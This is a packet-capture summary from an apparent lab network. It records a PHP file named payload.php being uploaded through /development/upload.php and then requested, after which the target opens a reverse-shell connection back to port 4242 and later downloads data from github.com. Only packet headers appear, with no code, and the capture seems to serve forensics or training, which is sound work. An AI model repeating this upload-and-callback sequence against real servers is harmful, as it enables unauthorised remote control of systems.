11 7.915625379 192.168.170.145 → 192.168.170.159 TCP 74 47734 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=3256067626 TSecr=0 WS=128
12 7.915783662 192.168.170.159 → 192.168.170.145 TCP 74 80 → 47734 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM TSval=894446790 TSecr=3256067626 WS=128
13 7.915903135 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=3256067627 TSecr=894446790
14 7.915992166 192.168.170.145 → 192.168.170.159 HTTP 1026 POST /development/upload.php HTTP/1.1 (application/x-php)
15 7.916108038 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47734 [ACK] Seq=1 Ack=961 Win=64256 Len=0 TSval=894446790 TSecr=3256067627
16 7.916964256 192.168.170.159 → 192.168.170.145 HTTP 309 HTTP/1.1 200 OK (text/html)
17 7.916975776 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [ACK] Seq=961 Ack=244 Win=64128 Len=0 TSval=3256067628 TSecr=894446791
18 11.984825193 192.168.170.145 → 192.168.170.159 HTTP 401 GET /development/uploads/ HTTP/1.1
19 11.985407246 192.168.170.159 → 192.168.170.145 HTTP 788 HTTP/1.1 200 OK (text/html)
20 11.985492397 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [ACK] Seq=1296 Ack=966 Win=64128 Len=0 TSval=3256071696 TSecr=894450859
21 16.986459371 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [FIN, ACK] Seq=1296 Ack=966 Win=64128 Len=0 TSval=3256076697 TSecr=894450859
22 16.986574454 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47734 [FIN, ACK] Seq=966 Ack=1297 Win=64128 Len=0 TSval=894455860 TSecr=3256076697
23 16.986655155 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [ACK] Seq=1297 Ack=967 Win=64128 Len=0 TSval=3256076697 TSecr=894455860
24 28.573920433 192.168.170.145 → 192.168.170.159 TCP 74 47736 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=3256088284 TSecr=0 WS=128
25 28.574038675 192.168.170.159 → 192.168.170.145 TCP 74 80 → 47736 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM TSval=894467447 TSecr=3256088284 WS=128
26 28.574114977 192.168.170.145 → 192.168.170.159 TCP 66 47736 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=3256088284 TSecr=894467447
27 28.574178738 192.168.170.145 → 192.168.170.159 HTTP 466 GET /development/uploads/payload.php HTTP/1.1
28 28.574306231 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894467448 TSecr=3256088284
29 28.577587788 192.168.170.159 → 192.168.170.145 TCP 74 57680 → 4242 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=894467451 TSecr=0 WS=128
30 28.577592188 192.168.170.145 → 192.168.170.159 TCP 74 4242 → 57680 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM TSval=3256088288 TSecr=894467451 WS=128
31 28.577678110 192.168.170.159 → 192.168.170.145 TCP 66 57680 → 4242 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=894467451 TSecr=3256088288
32 28.577728691 192.168.170.159 → 192.168.170.145 TCP 121 57680 → 4242 [PSH, ACK] Seq=1 Ack=1 Win=64256 Len=55 TSval=894467451 TSecr=3256088288
33 28.577735721 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=1 Ack=56 Win=65152 Len=0 TSval=3256088288 TSecr=894467451
34 38.757749641 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256098468 TSecr=894467448
35 38.757894444 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894477631 TSecr=3256088284
36 39.323816051 192.168.170.145 → 192.168.170.159 TCP 69 4242 → 57680 [PSH, ACK] Seq=1 Ack=56 Win=65152 Len=3 TSval=3256099034 TSecr=894467451
37 39.323916393 192.168.170.159 → 192.168.170.145 TCP 66 57680 → 4242 [ACK] Seq=56 Ack=4 Win=64256 Len=0 TSval=894478197 TSecr=3256099034
38 39.325002015 192.168.170.159 → 192.168.170.145 TCP 120 57680 → 4242 [PSH, ACK] Seq=56 Ack=4 Win=64256 Len=54 TSval=894478198 TSecr=3256099034
39 39.325065907 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=4 Ack=110 Win=65152 Len=0 TSval=3256099035 TSecr=894478198
40 39.325194169 192.168.170.159 → 192.168.170.145 TCP 68 57680 → 4242 [PSH, ACK] Seq=110 Ack=4 Win=64256 Len=2 TSval=894478198 TSecr=3256099035
41 39.325239331 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=4 Ack=112 Win=65152 Len=0 TSval=3256099035 TSecr=894478198
42 40.710537987 192.168.170.138 → 192.168.170.254 DHCP 338 DHCP Request - Transaction ID 0xdf5ef3a7
43 40.710799752 192.168.170.254 → 192.168.170.138 DHCP 342 DHCP ACK - Transaction ID 0xdf5ef3a7
44 44.659136740 192.168.170.145 → 192.168.170.159 TCP 113 4242 → 57680 [PSH, ACK] Seq=4 Ack=112 Win=65152 Len=47 TSval=3256104369 TSecr=894478198
45 44.677577863 192.168.170.159 → 192.168.170.145 TCP 130 57680 → 4242 [PSH, ACK] Seq=112 Ack=51 Win=64256 Len=64 TSval=894483551 TSecr=3256104369
46 44.677585633 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=51 Ack=176 Win=65152 Len=0 TSval=3256104388 TSecr=894483551
47 45.883299798 VMware_82:6c:a5 → VMware_e5:1f:cc ARP 42 Who has 192.168.170.254? Tell 192.168.170.138
48 45.883412361 VMware_e5:1f:cc → VMware_82:6c:a5 ARP 60 192.168.170.254 is at 00:50:56:e5:1f:cc
49 48.593184369 192.168.170.145 → 192.168.170.159 TCP 74 4242 → 57680 [PSH, ACK] Seq=51 Ack=176 Win=65152 Len=8 TSval=3256108303 TSecr=894483551
50 48.593672339 192.168.170.159 → 192.168.170.145 TCP 75 57680 → 4242 [PSH, ACK] Seq=176 Ack=59 Win=64256 Len=9 TSval=894487467 TSecr=3256108303
51 48.593744170 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=59 Ack=185 Win=65152 Len=0 TSval=3256108304 TSecr=894487467
52 48.594671419 192.168.170.159 → 192.168.170.145 TCP 78 57680 → 4242 [PSH, ACK] Seq=185 Ack=59 Win=64256 Len=12 TSval=894487468 TSecr=3256108304
53 48.594685199 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=59 Ack=197 Win=65152 Len=0 TSval=3256108305 TSecr=894487468
54 48.594748890 192.168.170.159 → 192.168.170.145 TCP 184 57680 → 4242 [PSH, ACK] Seq=197 Ack=59 Win=64256 Len=118 TSval=894487468 TSecr=3256108305
55 48.594807082 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=59 Ack=315 Win=65152 Len=0 TSval=3256108305 TSecr=894487468
56 48.595037346 192.168.170.159 → 192.168.170.145 TCP 130 57680 → 4242 [PSH, ACK] Seq=315 Ack=59 Win=64256 Len=64 TSval=894487468 TSecr=3256108305
57 48.595043106 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=59 Ack=379 Win=65152 Len=0 TSval=3256108305 TSecr=894487468
58 48.997256109 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256108707 TSecr=894477631
59 48.997335350 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894487870 TSecr=3256088284
60 52.615293905 192.168.170.145 → 192.168.170.159 TCP 80 4242 → 57680 [PSH, ACK] Seq=59 Ack=379 Win=65152 Len=14 TSval=3256112325 TSecr=894487468
61 52.615822285 192.168.170.159 → 192.168.170.145 TCP 81 57680 → 4242 [PSH, ACK] Seq=379 Ack=73 Win=64256 Len=15 TSval=894491489 TSecr=3256112325
62 52.615888056 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=73 Ack=394 Win=65152 Len=0 TSval=3256112326 TSecr=894491489
63 52.616362367 192.168.170.159 → 192.168.170.145 TCP 117 57680 → 4242 [PSH, ACK] Seq=394 Ack=73 Win=64256 Len=51 TSval=894491489 TSecr=3256112326
64 52.616371067 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=73 Ack=445 Win=65152 Len=0 TSval=3256112326 TSecr=894491489
65 52.616574160 192.168.170.159 → 192.168.170.145 TCP 130 57680 → 4242 [PSH, ACK] Seq=445 Ack=73 Win=64256 Len=64 TSval=894491489 TSecr=3256112326
66 52.616619251 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=73 Ack=509 Win=65152 Len=0 TSval=3256112326 TSecr=894491489
67 59.237795390 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256118947 TSecr=894487870
68 59.237911793 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894498111 TSecr=3256088284
69 69.478321357 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256129188 TSecr=894498111
70 69.478401749 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894508351 TSecr=3256088284
71 70.421572879 192.168.170.145 → 192.168.170.159 TCP 75 4242 → 57680 [PSH, ACK] Seq=73 Ack=509 Win=65152 Len=9 TSval=3256130131 TSecr=894491489
72 70.422063989 192.168.170.159 → 192.168.170.145 TCP 76 57680 → 4242 [PSH, ACK] Seq=509 Ack=82 Win=64256 Len=10 TSval=894509294 TSecr=3256130131
73 70.422069829 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=82 Ack=519 Win=65152 Len=0 TSval=3256130131 TSecr=894509294
74 70.423887636 192.168.170.159 → 192.168.170.145 TCP 76 57680 → 4242 [PSH, ACK] Seq=519 Ack=82 Win=64256 Len=10 TSval=894509296 TSecr=3256130131
75 70.423890196 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=82 Ack=529 Win=65152 Len=0 TSval=3256130133 TSecr=894509296
76 71.650622407 192.168.170.145 → 192.168.170.159 TCP 89 4242 → 57680 [PSH, ACK] Seq=82 Ack=529 Win=65152 Len=23 TSval=3256131360 TSecr=894509296
77 71.650937524 192.168.170.159 → 192.168.170.145 TCP 68 57680 → 4242 [PSH, ACK] Seq=529 Ack=105 Win=64256 Len=2 TSval=894510523 TSecr=3256131360
78 71.650944424 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=105 Ack=531 Win=65152 Len=0 TSval=3256131360 TSecr=894510523
79 71.674926908 192.168.170.159 → 192.168.170.145 TCP 127 57680 → 4242 [PSH, ACK] Seq=531 Ack=105 Win=64256 Len=61 TSval=894510547 TSecr=3256131360
80 71.674933498 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=105 Ack=592 Win=65152 Len=0 TSval=3256131384 TSecr=894510547
81 79.718858510 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256139428 TSecr=894508351
82 79.718997584 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894518591 TSecr=3256088284
83 80.220669335 192.168.170.145 → 192.168.170.159 TCP 71 4242 → 57680 [PSH, ACK] Seq=105 Ack=592 Win=65152 Len=5 TSval=3256139930 TSecr=894510547
84 80.221093213 192.168.170.159 → 192.168.170.145 TCP 72 57680 → 4242 [PSH, ACK] Seq=592 Ack=110 Win=64256 Len=6 TSval=894519093 TSecr=3256139930
85 80.221191495 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=110 Ack=598 Win=65152 Len=0 TSval=3256139930 TSecr=894519093
86 80.221306458 192.168.170.159 → 192.168.170.145 TCP 95 57680 → 4242 [PSH, ACK] Seq=598 Ack=110 Win=64256 Len=29 TSval=894519094 TSecr=3256139930
87 80.221365069 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=110 Ack=627 Win=65152 Len=0 TSval=3256139930 TSecr=894519094
88 82.384925514 192.168.170.145 → 192.168.170.159 TCP 75 4242 → 57680 [PSH, ACK] Seq=110 Ack=627 Win=65152 Len=9 TSval=3256142094 TSecr=894519094
89 82.385349973 192.168.170.159 → 192.168.170.145 TCP 76 57680 → 4242 [PSH, ACK] Seq=627 Ack=119 Win=64256 Len=10 TSval=894521257 TSecr=3256142094
90 82.385355363 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=119 Ack=637 Win=65152 Len=0 TSval=3256142094 TSecr=894521257
91 82.386795163 192.168.170.159 → 192.168.170.145 TCP 579 57680 → 4242 [PSH, ACK] Seq=637 Ack=119 Win=64256 Len=513 TSval=894521259 TSecr=3256142094
92 82.386798183 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=119 Ack=1150 Win=64640 Len=0 TSval=3256142096 TSecr=894521259
93 82.387045417 192.168.170.159 → 192.168.170.145 TCP 95 57680 → 4242 [PSH, ACK] Seq=1150 Ack=119 Win=64256 Len=29 TSval=894521259 TSecr=3256142096
94 82.387106419 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=119 Ack=1179 Win=64640 Len=0 TSval=3256142096 TSecr=894521259
95 85.689999379 192.168.170.145 → 192.168.170.159 TCP 74 4242 → 57680 [PSH, ACK] Seq=119 Ack=1179 Win=64640 Len=8 TSval=3256145399 TSecr=894521259
96 85.690358617 192.168.170.159 → 192.168.170.145 TCP 75 57680 → 4242 [PSH, ACK] Seq=1179 Ack=127 Win=64256 Len=9 TSval=894524562 TSecr=3256145399
97 85.690407117 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=127 Ack=1188 Win=64640 Len=0 TSval=3256145399 TSecr=894524562
98 85.693199973 192.168.170.159 → 192.168.170.145 TCP 93 57680 → 4242 [PSH, ACK] Seq=1188 Ack=127 Win=64256 Len=27 TSval=894524565 TSecr=3256145399
99 85.693319126 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=127 Ack=1215 Win=64640 Len=0 TSval=3256145402 TSecr=894524565
100 87.592945663 192.168.170.145 → 192.168.170.159 TCP 89 4242 → 57680 [PSH, ACK] Seq=127 Ack=1215 Win=64640 Len=23 TSval=3256147302 TSecr=894524565
101 87.594143248 192.168.170.159 → 192.168.170.145 TCP 68 57680 → 4242 [PSH, ACK] Seq=1215 Ack=150 Win=64256 Len=2 TSval=894526466 TSecr=3256147302
102 87.594229619 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=150 Ack=1217 Win=64640 Len=0 TSval=3256147303 TSecr=894526466
103 87.599894814 192.168.170.159 → 192.168.170.145 TCP 370 57680 → 4242 [PSH, ACK] Seq=1217 Ack=150 Win=64256 Len=304 TSval=894526472 TSecr=3256147303
104 87.599948715 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=150 Ack=1521 Win=64384 Len=0 TSval=3256147309 TSecr=894526472
105 89.958341754 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256149667 TSecr=894518591
106 89.958477887 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894528830 TSecr=3256088284
107 92.969168584 192.168.170.138 → 91.189.91.157 NTP 90 NTP Version 4, client
108 93.049609940 VMware_f9:85:10 → Broadcast ARP 60 Who has 192.168.170.138? Tell 192.168.170.2
109 93.049623211 VMware_82:6c:a5 → VMware_f9:85:10 ARP 42 192.168.170.138 is at 00:0c:29:82:6c:a5
110 93.049776854 91.189.91.157 → 192.168.170.138 NTP 90 NTP Version 4, server
111 95.931106336 192.168.170.145 → 192.168.170.159 TCP 87 4242 → 57680 [PSH, ACK] Seq=150 Ack=1521 Win=64384 Len=21 TSval=3256155640 TSecr=894526472
112 95.931488256 192.168.170.159 → 192.168.170.145 TCP 88 57680 → 4242 [PSH, ACK] Seq=1521 Ack=171 Win=64256 Len=22 TSval=894534803 TSecr=3256155640
113 95.931564807 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=171 Ack=1543 Win=64384 Len=0 TSval=3256155640 TSecr=894534803
114 95.935050278 192.168.170.159 → 192.168.170.145 TCP 1528 57680 → 4242 [PSH, ACK] Seq=1543 Ack=171 Win=64256 Len=1462 TSval=894534807 TSecr=3256155640
115 95.935095939 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=171 Ack=3005 Win=64128 Len=0 TSval=3256155644 TSecr=894534807
116 95.935531281 192.168.170.159 → 192.168.170.145 TCP 95 57680 → 4242 [PSH, ACK] Seq=3005 Ack=171 Win=64256 Len=29 TSval=894534807 TSecr=3256155644
117 95.935587742 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=171 Ack=3034 Win=64128 Len=0 TSval=3256155644 TSecr=894534807
118 98.107828955 VMware_82:6c:a5 → VMware_f9:85:10 ARP 42 Who has 192.168.170.2? Tell 192.168.170.138
119 98.107934218 VMware_f9:85:10 → VMware_82:6c:a5 ARP 60 192.168.170.2 is at 00:50:56:f9:85:10
120 130.788992697 192.168.170.145 → 192.168.170.159 TCP 118 4242 → 57680 [PSH, ACK] Seq=171 Ack=3034 Win=64128 Len=52 TSval=3256190497 TSecr=894534807
121 130.789693015 192.168.170.159 → 192.168.170.145 TCP 121 57680 → 4242 [PSH, ACK] Seq=3034 Ack=223 Win=64256 Len=55 TSval=894569661 TSecr=3256190497
122 130.789742216 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=3089 Win=64128 Len=0 TSval=3256190497 TSecr=894569661
123 130.790524817 192.168.170.159 → 192.168.170.145 TCP 98 57680 → 4242 [PSH, ACK] Seq=3089 Ack=223 Win=64256 Len=32 TSval=894569661 TSecr=3256190497
124 130.790594169 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=3121 Win=64128 Len=0 TSval=3256190498 TSecr=894569661
125 130.812969381 192.168.170.159 → 192.168.170.2 DNS 81 Standard query 0xea9e A github.com OPT
126 130.813022012 192.168.170.159 → 192.168.170.2 DNS 81 Standard query 0xa865 AAAA github.com OPT
127 130.821353619 VMware_f9:85:10 → Broadcast ARP 60 Who has 192.168.170.159? Tell 192.168.170.2
128 130.821367729 VMware_6e:18:17 → VMware_f9:85:10 ARP 60 192.168.170.159 is at 00:0c:29:6e:18:17
129 130.821456311 192.168.170.2 → 192.168.170.159 DNS 165 Standard query response 0xa865 AAAA github.com SOA ns-1707.awsdns-21.co.uk OPT
130 130.834210483 192.168.170.2 → 192.168.170.159 DNS 97 Standard query response 0xea9e A github.com A 140.82.118.4 OPT
131 130.840570509 192.168.170.159 → 140.82.118.4 TCP 74 42174 → 443 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=1118180778 TSecr=0 WS=128
132 130.868572111 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460
133 130.868722995 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1 Ack=1 Win=64240 Len=0
134 130.894779433 192.168.170.159 → 140.82.118.4 TLSv1 290 Client Hello
135 130.894864666 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=1 Ack=237 Win=64240 Len=0
136 130.923858220 140.82.118.4 → 192.168.170.159 TLSv1.2 1490 Server Hello
137 130.923918441 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=237 Ack=1437 Win=63184 Len=0
138 130.924009433 140.82.118.4 → 192.168.170.159 TLSv1.2 2058 Certificate, Server Key Exchange, Server Hello Done
139 130.924070965 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=237 Ack=3441 Win=63184 Len=0
140 130.924943889 192.168.170.159 → 140.82.118.4 TLSv1.2 129 Client Key Exchange
141 130.925008519 192.168.170.159 → 140.82.118.4 TLSv1.2 105 Change Cipher Spec, Encrypted Handshake Message
142 130.925010399 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=3441 Ack=312 Win=64240 Len=0
143 130.925010899 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=3441 Ack=363 Win=64240 Len=0
144 131.038254985 140.82.118.4 → 192.168.170.159 TLSv1.2 105 Change Cipher Spec, Encrypted Handshake Message
145 131.038924192 192.168.170.159 → 140.82.118.4 TLSv1.2 282 Application Data
146 131.038973985 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=3492 Ack=591 Win=64240 Len=0
147 131.405066405 140.82.118.4 → 192.168.170.159 TLSv1.2 474 Application Data
148 131.413988747 140.82.118.4 → 192.168.170.159 TLSv1.2 88 Application Data
149 131.414117629 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=591 Ack=3946 Win=63184 Len=0
150 131.415503346 140.82.118.4 → 192.168.170.159 TLSv1.2 408 Application Data
151 131.415743931 140.82.118.4 → 192.168.170.159 TLSv1.2 152 Application Data
152 131.415819643 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=591 Ack=4398 Win=63184 Len=0
153 131.416248475 140.82.118.4 → 192.168.170.159 TLSv1.2 86 Application Data
154 131.416464271 140.82.118.4 → 192.168.170.159 TLSv1.2 94 Application Data
155 131.416543553 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=591 Ack=4470 Win=63184 Len=0
156 131.418370130 192.168.170.159 → 140.82.118.4 TLSv1.2 490 Application Data
157 131.418445612 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=4470 Ack=1027 Win=64240 Len=0
158 131.738353327 140.82.118.4 → 192.168.170.159 TLSv1.2 422 Application Data
159 131.754083486 140.82.118.4 → 192.168.170.159 TLSv1.2 86 Application Data
160 131.754418814 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=4870 Win=63184 Len=0
161 131.754441005 140.82.118.4 → 192.168.170.159 TLSv1.2 93 Application Data
162 131.762910965 140.82.118.4 → 192.168.170.159 TLSv1.2 208 Application Data, Application Data
163 131.763032179 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=5063 Win=63184 Len=0
164 131.763155262 192.168.170.159 → 192.168.170.145 TCP 160 57680 → 4242 [PSH, ACK] Seq=3121 Ack=223 Win=64256 Len=94 TSval=894570634 TSecr=3256190498
165 131.763270215 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=3215 Win=64128 Len=0 TSval=3256191471 TSecr=894570634
166 131.788967723 140.82.118.4 → 192.168.170.159 TLSv1.2 1406 Application Data
167 131.789534609 192.168.170.145 → 192.168.170.159 TCP 66 [TCP ACKed unseen segment] 4242 → 57680 [ACK] Seq=223 Ack=4860 Win=63488 Len=0 TSval=3256191497 TSecr=894570660
168 131.789545279 192.168.170.159 → 192.168.170.145 TCP 1711 [TCP Spurious Retransmission] 57680 → 4242 [PSH, ACK] Seq=3215 Ack=223 Win=64256 Len=1645 TSval=894570660 TSecr=3256191471
169 131.834482227 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=6415 Win=63184 Len=0
170 131.838951814 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
171 131.839037965 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=7814 Win=63184 Len=0
172 131.839105227 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
173 131.839150978 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=9213 Win=63184 Len=0
174 131.847695021 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
175 131.847756852 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=10612 Win=63184 Len=0
176 131.847865055 140.82.118.4 → 192.168.170.159 TLSv1.2 1490 Application Data
177 131.847870295 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=12048 Win=63184 Len=0
178 131.848434910 192.168.170.159 → 140.82.118.4 TCP 60 [TCP ACKed unseen segment] 42174 → 443 [ACK] Seq=1027 Ack=14846 Win=63184 Len=0
179 131.848437620 140.82.118.4 → 192.168.170.159 TCP 2852 [TCP Spurious Retransmission] 443 → 42174 [PSH, ACK] Seq=12048 Ack=1027 Win=64240 Len=2798
180 131.848852261 140.82.118.4 → 192.168.170.159 TLSv1.2 774 Ignored Unknown Record
181 131.848906412 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=15566 Win=63184 Len=0
182 131.849720413 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4860 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191497
183 131.849772045 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=4894 Win=64128 Len=0 TSval=3256191557 TSecr=894570721
184 131.849868017 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4894 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191557
185 131.849869847 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=4928 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
186 131.849980410 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4928 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
187 131.849982040 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=4962 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
188 131.850048142 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4962 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
189 131.850124294 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=4996 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
190 131.850181165 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4996 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
191 131.850182615 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=5030 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
192 131.850278739 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=5030 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
193 131.850280589 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=5064 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
194 131.850374910 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=5064 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
195 131.850376470 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=5098 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
196 131.873954554 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
197 131.874032897 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=16965 Win=63184 Len=0
198 131.874433746 140.82.118.4 → 192.168.170.159 TLSv1.2 1490 Application Data
199 131.874441207 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=18401 Win=63184 Len=0
200 131.874636281 140.82.118.4 → 192.168.170.159 TLSv1.2 1416 Application Data
201 131.874638441 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=19763 Win=63184 Len=0
202 131.875027452 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
203 131.875054433 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=21162 Win=63184 Len=0
204 131.924706244 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
